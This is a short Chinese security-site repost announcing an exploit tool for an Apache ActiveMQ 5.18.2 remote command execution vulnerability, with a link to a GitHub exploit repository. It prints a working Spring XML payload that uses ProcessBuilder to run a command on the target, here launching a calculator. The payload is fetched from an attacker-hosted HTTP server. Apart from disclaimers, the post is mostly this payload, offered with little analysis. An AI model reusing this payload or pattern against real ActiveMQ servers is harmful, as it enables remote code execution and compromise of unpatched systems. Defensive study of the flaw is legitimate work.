Apache - ActiveMQ 5.18.2 远程命令执行漏洞

admin 2023年10月30日02:08:41评论70 views字数 783阅读2分36秒阅读模式


仓库:https://github.com/JaneMandy/ActiveMQExploit

最近出了一个ActiveMQ 新漏洞,正好在参加活动的过程中,我们开发了一个相应的漏洞利用工具(Exploit)。

虽然我们不会深入详细分析这个漏洞,但已经有一些安全专家对其进行了分析。这个漏洞需要您搭建一个HTTP服务,我们的Exploit将发送Payload到目标服务器。目标服务器会下载这个Payload,其中包含XML数据,并执行相关操作。我们希望所有安全专家都能充分利用这个漏洞,获得更多的洞察和经验。

Apache - ActiveMQ 5.18.2 远程命令执行漏洞

图:漏洞利用

Payload代码

<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>open</value> <value>-a</value> <value>calculator</value> </list> </constructor-arg> </bean></beans>

请勿用途,非法用途

原文始发于微信公众号(猫头鹰安全团队):Apache - ActiveMQ 5.18.2 远程命令执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月30日02:08:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache - ActiveMQ 5.18.2 远程命令执行漏洞https://cn-sec.com/archives/2152421.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息